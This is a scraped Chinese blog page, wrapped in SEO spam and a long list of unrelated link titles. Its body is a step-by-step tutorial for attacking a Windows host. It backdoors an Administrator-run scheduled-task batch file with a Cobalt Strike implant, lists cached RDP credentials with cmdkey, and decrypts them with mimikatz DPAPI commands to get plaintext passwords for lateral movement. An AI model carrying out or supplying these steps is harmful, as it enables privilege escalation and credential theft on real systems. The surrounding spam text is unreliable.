当前位置: 首页 > wzjs >正文

wordpress页面栏目南宁seo多少钱报价

wordpress页面栏目,南宁seo多少钱报价,清江开发公司官网,做有后台的网站RDP(远程桌面协议)在连接过程中会缓存凭据,尤其是在启用了 "保存密码" 或 "凭据管理器" 功能时。这个缓存的凭据通常是用于自动填充和简化后续连接的过程。凭据一般包含了用户的用户名和密码信息,或者是经过加…

RDP(远程桌面协议)在连接过程中会缓存凭据,尤其是在启用了 "保存密码" 或 "凭据管理器" 功能时。这个缓存的凭据通常是用于自动填充和简化后续连接的过程。凭据一般包含了用户的用户名和密码信息,或者是经过加密的身份验证令牌

所以我们想登录这个rdp缓存,就是先找到凭证,再通过mimikatz来解密凭证,获取明文

0x01 以administrator权限上线

WIN+R 输入taskschd.msc

打开任务计划程序

找到批处理文件(.bat) 是Administrator创建的,找到他的目录

写入cs马子

后在任务计划程序运行net.bat

就成功上线了

注意:不是说找到一个由administrator创建的.bat文件就行,而是说在计划任务中,这个由administrator创建的.bat可以以administrator的身份去运行。

0X02 找到RDP凭据

用administrator权限来执行下面的命令

cmdkey /list

发现存在凭证后

再用里面的文件浏览功能

之后找到下面的凭据

再次说明,这个凭据是因为administrator在RDP其他主机的时候,选择了记住我的凭证功能,然后在本地保留了一个凭证

0x03 获取guidMasterKey

privilege::debug
dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\F18D03964B3469BAEA4542A7792D663B

0x04 获取MasterKey对应的

privilege::debug 
sekurlsa::dpapi

0x05 拿MasterKey进行解密

 mimikatz dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\F18D03964B3469BAEA4542A7792D663B /masterkey:2af578e7d889e691901422cabdd559e42d0a03882073e7ca46abc03422547ec7108113dc8928326cc181c69b6eff2fa7d87a06254474f0a892f9c183d56aae55

找到明文密码 就可以登录,达到横向移动->RDP的渗透手法

http://www.dtcms.com/wzjs/481.html

相关文章:

  • a站和b站哪个更好视频百度关键词代做排名
  • 黄骅市职教中心网站优化排名网站
  • 做网站有什么建议厦门seo关键词优化
  • 建设400官方网站网店代运营需要多少钱
  • 房建设计网站好今日热点事件
  • 手机网站判断跳转怎么建立一个属于自己的网站
  • 深圳微商城网站制作多少钱产品宣传
  • 天津 网站设计制作公司注册百度账号
  • 建设大型网站的公司青岛关键词排名系统
  • 黄石网站设计最近的新闻热点
  • 美国做电商网站网站广告收费标准
  • 商城网站建设哪个比较好常见的网络营销推广方式有哪些
  • 网站模板 缓存商标湖南网站营销seo多少费用
  • 公司注册网站官网游戏推广赚钱
  • 太原公司网站建设品牌营销策略四种类型
  • 辽宁建设网站全达seo
  • 网站建设所有软件清单营销团队
  • 未来商城网站建设网站如何宣传推广
  • 网站推广渠道及特点营销网
  • 网站开发需要用什么软件网站推广优化怎样
  • 盐城网站建设0515icp十大搜索引擎地址
  • wordpress登录界面源码网页seo优化
  • 网站怎么做网站收录营销推广的主要方法
  • 中国建设银行数据管理部网站在哪里找软件开发公司
  • 农产品网站建设怎么办网站平台
  • 网站建设哪家效益快搜狗搜索引擎优化论文
  • 一个人怎样做网站抖音广告投放平台官网
  • 温州 网站建设长沙seo男团
  • 网站推广站群百度关键词搜索引擎排名优化
  • wordpress抓取插件seo推广营销公司